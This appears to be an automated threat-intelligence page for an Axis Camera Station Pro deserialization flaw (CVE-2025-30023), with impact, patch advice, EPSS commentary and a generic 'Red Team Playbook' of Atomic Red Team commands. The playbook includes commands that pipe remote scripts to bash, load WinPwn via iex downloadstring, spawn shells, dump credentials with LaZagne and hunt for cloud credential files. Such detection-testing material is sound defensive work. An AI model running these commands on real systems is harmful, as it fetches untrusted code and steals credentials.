CVE-2025-30023
Overview
This vulnerability is a deserialization flaw (CWE-502) in the communication protocol between client and server components of Axis Communications AB AXIS Camera Station Pro. It arises from improper validation of serialized data exchanged over authenticated channels, allowing maliciously crafted input to be processed by the server. The affected components include the client-server communication protocol handling serialized objects within the AXIS Camera Station and Device Manager products.
Vulnerability Description
The communication protocol used between client and server had a flaw that could lead to an authenticated user performing a remote code execution attack.
Impact
An authenticated attacker with network access to the client-server communication channel can execute arbitrary code remotely on the server hosting the AXIS Camera Station Pro or Device Manager. This allows full compromise of the affected system, including unauthorized control over video management and device configurations. The attack requires low complexity (AC:L) and privileges (PR:L) but no user interaction (UI:N), with a scope change (S:C) and high impact on confidentiality, integrity, and availability (C:H/I:H/A:H) as per the CVSS vector.
Solution
Axis Communications has released patches addressing this vulnerability for AXIS Camera Station Pro and Device Manager products. Users should apply the updates as detailed in the vendor advisory available at https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf. The advisory provides specific version numbers and update instructions to remediate the deserialization flaw. No additional workarounds are specified beyond applying the official patches.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the communication protocol utilized by certain Axis products, including the Camera Station and Device Manager, presents a significant risk due to its potential for remote code execution. This flaw allows an authenticated user to send specially crafted requests to the server, which can lead to arbitrary code execution. The underlying issue stems from inadequate input validation and insufficient controls in the protocol's design, enabling attackers to manipulate the data exchanged between the client and server. This vulnerability underscores the critical importance of robust protocol design and the need for stringent validation mechanisms to prevent unauthorized actions.
Attack vectors for exploiting this vulnerability are particularly concerning, as they can be executed by authenticated users, which may include both legitimate users and malicious insiders. An attacker could leverage social engineering techniques to gain access to valid credentials or exploit weak password policies to authenticate themselves. Once authenticated, the attacker can issue commands that the server would normally accept, leading to the execution of arbitrary code. This scenario not only highlights the potential for remote code execution but also raises alarms about the implications of insider threats, where an authenticated user could intentionally or unintentionally compromise the system.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Axis products for surveillance and security management. Successful exploitation could result in unauthorized access to sensitive video feeds, manipulation of camera settings, or even the deployment of malware within the network. The business risks associated with such breaches include financial losses, reputational damage, and potential legal ramifications stemming from non-compliance with data protection regulations. Furthermore, the ability to execute arbitrary code could allow attackers to pivot to other systems within the network, exacerbating the overall security posture of the organization.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and penetration testing can help identify weaknesses in the communication protocol and overall system architecture. Additionally, organizations should enforce strict access controls, ensuring that only authorized personnel have the ability to authenticate and interact with the system. Employing intrusion detection systems (IDS) can also aid in monitoring for unusual activity that may indicate exploitation attempts. Furthermore, timely patch management is crucial; organizations must stay informed about updates from Axis and apply security patches as they become available to remediate vulnerabilities.
In conclusion, the vulnerability within the communication protocol of certain Axis products poses a significant threat to the integrity and security of affected systems. The potential for remote code execution by authenticated users highlights the need for organizations to prioritize security measures that encompass both technical and procedural safeguards. By adopting a proactive stance on vulnerability management, including regular assessments, stringent access controls, and prompt patching, organizations can mitigate the risks associated with this and similar vulnerabilities, ultimately enhancing their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-30023, rising by over 150% to a current level that places it near the 91st percentile among tracked vulnerabilities. This significant uptick, while not accompanied by new exploit samples or active campaign reports, indicates growing confidence within the threat actor community regarding the feasibility or value of exploiting this vulnerability. Our telemetry shows the trend has stabilized recently, suggesting the vulnerability is gaining steady attention rather than experiencing a sudden surge. For defenders, this shift underscores an elevated risk profile that warrants heightened vigilance, as the increased EPSS score often precedes wider exploitation attempts. Although no direct exploitation has been observed yet, the upward trajectory signals that threat actors may be preparing or refining capabilities to leverage this flaw, potentially increasing the likelihood of future remote code execution incidents in environments using Axis Communications AB AXIS Camera Station Pro. Consequently, the threat level should be considered elevated from moderate to high, reflecting the growing probability of exploitation despite the current absence of confirmed attacks.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Axis | Camera Station | All |
cpe:2.3:a:axis:camera_station:*:*:*:*:*:*:*:*
|
|
|
Axis | Camera Station Pro | All |
cpe:2.3:a:axis:camera_station_pro:*:*:*:*:*:*:*:*
|
|
|
Axis | Device Manager | All |
cpe:2.3:a:axis:device_manager:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-30023 |
| axis.com |
GitHub CVE
|
https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf |